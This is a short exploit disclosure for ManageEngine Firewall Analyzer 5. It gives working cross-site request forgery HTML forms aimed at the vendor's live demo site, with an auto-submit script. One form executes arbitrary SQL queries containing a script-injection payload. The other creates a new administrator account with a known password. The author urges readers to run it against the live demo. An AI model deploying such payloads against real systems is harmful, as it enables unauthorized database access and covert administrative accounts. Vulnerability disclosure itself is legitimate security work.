The ManageEngine Firewall Analyzer version 5 suffers from cross site request forgery and cross site scripting vulnerabilities.
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Written By Michael Brooks
Special thanks to str0ke!
Product: ManageEngine Firewall Analyzer 5 - XSRF and XSS
Vulerable version:
Build Version : 5.0.0
Build Number : 5000
Build Date : Apr_25
homepage:
http://fwanalyzer.com/
This is live exploit code against the online demo. Go ahead, run it!
With this exploit you can execute any SQL query you want, this is not
SQL Injection. I think its funny that the sql query is also
vulnerable to xss.
XSRF to execute Arbatrary SQL Queries. This is not SQL Injection,
its better because you can execute *any* query.
<html>
<form action='http://demo.fwanalyzer.com/fw/runQuery.do' method='POST' id=1>
<input type=hidden name="execute" value="true" >
<input type=hidden name="DatabaseType" value="mysql">
<input type=hidden name="query" value='select
"<script>alert(/0wn3d/)</script>"'>
<input type=submit>
</form>
</html>
Create a new administrative account badmin:badmin:
<html>
<form action='http://demo.fwanalyzer.com/fw/userManagementForm.do'
method='POST' id=2>
<input type=hidden name='addField' value='true'>
<input type=hidden name='productName' value='firewall'>
<input type=hidden name='userType' value='Administrator'>
<input type=hidden name='licType' value='Prem'>
<input type=hidden name='userName' value='madmin'>
<input type=hidden name='pwd1' value='badmin'>
<input type=hidden name='password' value='badmin'>
<input type=hidden name='userGroup' value='Administrator'>
<input type=hidden name='email' value='badmin@badmin.com'>
<input type=hidden name='availableDevices' value='301'>
<input type=hidden name='Submit3' value='Add User'>
<input type=submit>
</form>
</html>
<script>
document.getElementById(1).submit();
//document.getElementById(2).submit();
</script>